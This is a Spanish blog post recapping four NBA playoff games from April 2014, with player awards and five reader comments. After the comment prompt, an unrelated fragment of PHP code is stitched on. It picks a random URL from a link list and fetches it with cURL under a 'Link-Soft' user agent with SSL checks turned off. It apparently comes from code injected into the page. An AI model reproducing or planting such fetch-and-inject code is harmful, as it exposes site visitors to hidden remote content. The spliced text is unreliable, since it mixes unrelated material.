La Crónica: Tormenta de espadas

28 de April de 2014 por TheDeerHunter

En medio del triste escándalo que ha tenido a bien generar Donald Sterling, los Warriors nos regalaron anoche primer un cuarto para enmarcar. Consiguieron nada menos que 39 puntos de la mano de un Stephen Curry en modo leyenda. Después volverían a una cierta normalidad pero  Doc Rivers no encontró la fórmula para parar ese curioso small-ball que inventó Marc Jackson. Llama la atención que DeAndre haya tenido más problemas con un juego interior formado por David Lee y Draymond Green que con un pívot de verdad en frente. El nivel de acierto de los Warriors dio verdadero miedo. Tablas en el parcial de la serie pero la polémica ha podido afectar gravemente la moral de los Clippers.

Los Blazers lograron amarrar la victoria local que les hacía falta para dejar encarada la serie. No lo tuvieron fácil y necesitaron prórroga y cierta suerte para ello. McHale condenó a Terrence Jones al banco, después de todos los problemas que ha tenido para frenar a LaMarcus pero la defensa de Asik tampoco ha sido para tirar cohetes a su favor. Pésimo partido de Jeremy Lin, quien perdió un balón decisivo en los minutos finales del tiempo regular. En cambio, extraordinaria segunda actuación del rookie Troy Daniels, en el segundo partido de playoffs de su vida. No sirvió para mucho.

Los Raptors recuperaron la ventaja campo en la difícil pista del Barklays Center de Brooklyn y cada día da mayor impresión de que han perdido el respeto a la vieja guardia. Otro gran partido de DeRozan, bien acompañado de Lowry y, por esta vez, de Amir Johnson, que estuvo inmenso. Por los Nets desaparición de Joe Johnson, quien hasta ahora había sido determinante y también de Deron Williams. Mal partido en general de todos ellos y pésimo acierto desde los tiros libres. La experiencia, esta vez, no fue un grado. 

Finalmente los Bulls se teminaron de complicar la existencia. Sin Nene los Wizards encontraron en Ariza el referente ofensivo que les hacía falta. Por los toros sólo Taj Gibson fue capaz de hacerles frente. Comentario particular y no pretende ser oportunista: ésta es la imagen que muchos consideramos habitual en Carlos Boozer. Por su estatus teórico de jugador no debería permitírselo.

PREMIOS


MVP:  Stephen Curry
empezó el partido en modo crack. Consiguió 17 de sus 33 puntos en los primeros 12 minutos. Es el 2º jugador en la historia tras Mookie Blaylock que consigue 7 rebotes, 7 asistencias y 7 triples en un partido de playoffs. Lamarcus Aldridge (29p – 10r – 4t) falló dos tiros libres en los últimos segundos del partido que mantuvieron con vida a los Rockets pero el partido no hubiera llegado a la prórroga sinó hubiera sido por él.

Rookie: Habrá que nombrar a Troy Daniels de nuevo. Tras su anterior partido no parece casualidad que el rookie anotara esta vez 17 puntos con un 4 de 5 en T3. McHale debe estar pensando si darle 25 tiros por noche.

Sorpresa: Enorme partido de Trevor Ariza. Fue el mejor de los Wizards con 30 puntos (6 de 10 en T3), 8 rebotes y 2 robos. Con él en pista los Wizards son muchomás peligrosos.

Decepción: La pareja de bases de Houston estuvo totalmente perdida anoche. Entre Jeremy Lin y Patrick Beverley anotaron 10 puntos con un 3 de 13 en tiros de campo y perdieron 5 balones.

Esfuerzo en vano: ¿Taj Gibson >>> Carlos Boozer? No fueron solo los 32 puntos (13 de 16 en TC) y 7 rebotes del primero sinó su intensidad durante todo el partido lo que da pistas sobre la respuesta. Sin embargo, poco pudieron hacer los Bulls.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Ya que se utiliza el nombre de un libro de Juego de Tronos,usaremos el mismo universo literario para decir de Boozer: “Amnesty is coming” xDD

    No recuerdo unos PO en su primera ronda tan buenos.La eliminatoria POR – HOU es una delicia,con un nivel físico altísimo,con los titulares jugando minutadas..el próximo partido en Texas,ya con el lema “Win or Go Home”.Howard excelente en la serie,me está gustando mucho,muy centrado y agresivo,hacía tiempo que no se le veía así.

    Esto no para,ansioso por ver la reacción de los Spurs en Dallas,necesitan ganar para no verse al borde del abismo.

      Citar

  2. Oli dice:
    #2

    El otro día escuche que desde que están los playoffs con 16 equipos sólo habían superado como máximo 3 equipos con campo en contra en un mismo a?o, no se si será correcto el dato pero este a?o pinta que se puede superar ese récord y si no se supera no pasa porque están siendo unos playoffs cojonudos tanto en el oeste, que ya se preveía, como en el este que para mi están siendo una sorpresa

      Citar

  3. Esteban dice:
    #3

    Oli:
    El otro día escuche que desde que están los playoffs con 16 equipos sólo habían superado como máximo 3 equipos con campo en contra en un mismo a?o, no se si será correcto el dato pero este a?o pinta que se puede superar ese récord y si no se supera no pasa porque están siendo unos playoffs cojonudos tanto en el oeste, que ya se preveía, como en el este que para mi están siendo una sorpresa

    en el este la unica sorpresa entiendo yo que son los wizards que iban de punto en la eliminataria, el Heat esta haciendo lo suyo a punto de barrer, los Nets y Raptors se preveia que iran a 7 juegos, y bueno lo de los Pacers, si bien habia ilusion de verlos nuevamente poderosos, era tambien de esperar que jugaran a este nivel

      Citar

  4. Esteban dice:
    #4

    ojo con Boozer, es cierto que esta lejos de merecer 20 millones al año, pero si lo amnistian, algun equipo lo puede comprar por 4 ol 5 millones, y a ese valor puede ser una ganga (estilo Scola)

    me suena mucho mucho para los lakers

      Citar

  5. Nacho dice:
    #5

    Hay cosas que nunca entenderé en este deporte. Dallas tiene al mejor triplista en porcentaje de la liga, esta noche con 3 de 4. Y juega las posesiones calientes sin él. No digo que Calderón se la tire, pero un dolor de cabeza para la defensa seguro que es. Bueno, allá ellos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>